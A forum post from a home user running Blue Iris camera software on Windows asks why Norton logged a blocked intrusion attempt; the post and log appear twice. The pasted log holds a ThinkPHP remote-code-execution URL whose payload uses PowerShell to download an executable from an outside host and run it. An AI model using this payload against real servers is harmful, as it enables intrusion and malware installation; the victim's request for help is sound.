I run Blue Iris on my home computer to monitor 4 home cameras. The system is windows 10 and we access information remotely on both an IOS and Android device. I use a Google Mesh system for my router.
Lately I have seen increasing intrusion attempts, which appear to be stopped by my Norton Anti-Virus program, which incorporates a firewall. I also run Malwarebytes premium on the computer.
The following is what Norton lists as an Intrusion Attempt. I don't understand it, as it says it originates from my computer. I've obscured my IP information and it is bolded as my computer name, an my internal and external IP addresses.
Can anyone help explain what is happening, and are there other steps I should take to secure my system?
Thanks in advance,
John
Category: Intrusion Prevention
Date & Time,Risk,Activity,Status,Recommended Action,IPS Alert Name,Default Action,Action Taken,Attacking Computer,Attacker URL,Destination Address,Source Address,Traffic Description
3/26/2019 1:07:05 AM,High,An intrusion attempt by MYCOMPUTER was blocked.,Blocked,No Action Required,System Infected: Downloader Download 5,No Action Required,No Action Required,"MYCOMPUTER (MyInternal IP, 8081)","MyExternal IP/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ohjjiyvtnayjtec27467.exe');start C:/Windows/temp/ohjjiyvtnayjtec27467.exe","113.248.157.129, 11839",MYCOMPUTER (MyInternal IP),"TCP, Port 8081"
Network traffic from <b>MyExternal IP/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ohjjiyvtnayjtec27467.exe');start C:/Windows/temp/ohjjiyvtnayjtec27467.exe</b> matches the signature of a known attack. The attack was resulted from \DEVICE\HARDDISKVOLUME6\PROGRAM FILES\BLUE IRIS 4\BLUEIRIS.EXE. To stop being notified for this type of traffic, in the <b>Actions</b> panel, click <b>Stop Notifying Me</b>.
Lately I have seen increasing intrusion attempts, which appear to be stopped by my Norton Anti-Virus program, which incorporates a firewall. I also run Malwarebytes premium on the computer.
The following is what Norton lists as an Intrusion Attempt. I don't understand it, as it says it originates from my computer. I've obscured my IP information and it is bolded as my computer name, an my internal and external IP addresses.
Can anyone help explain what is happening, and are there other steps I should take to secure my system?
Thanks in advance,
John
Category: Intrusion Prevention
Date & Time,Risk,Activity,Status,Recommended Action,IPS Alert Name,Default Action,Action Taken,Attacking Computer,Attacker URL,Destination Address,Source Address,Traffic Description
3/26/2019 1:07:05 AM,High,An intrusion attempt by MYCOMPUTER was blocked.,Blocked,No Action Required,System Infected: Downloader Download 5,No Action Required,No Action Required,"MYCOMPUTER (MyInternal IP, 8081)","MyExternal IP/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ohjjiyvtnayjtec27467.exe');start C:/Windows/temp/ohjjiyvtnayjtec27467.exe","113.248.157.129, 11839",MYCOMPUTER (MyInternal IP),"TCP, Port 8081"
Network traffic from <b>MyExternal IP/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ohjjiyvtnayjtec27467.exe');start C:/Windows/temp/ohjjiyvtnayjtec27467.exe</b> matches the signature of a known attack. The attack was resulted from \DEVICE\HARDDISKVOLUME6\PROGRAM FILES\BLUE IRIS 4\BLUEIRIS.EXE. To stop being notified for this type of traffic, in the <b>Actions</b> panel, click <b>Stop Notifying Me</b>.
